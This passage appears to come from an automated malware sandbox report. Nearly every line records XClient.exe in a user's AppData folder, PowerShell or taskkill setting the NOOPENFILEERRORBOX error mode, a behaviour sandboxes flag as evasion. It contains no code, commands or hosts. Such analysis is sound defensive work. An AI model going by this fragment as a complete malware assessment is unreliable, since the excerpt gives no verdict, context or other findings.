Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
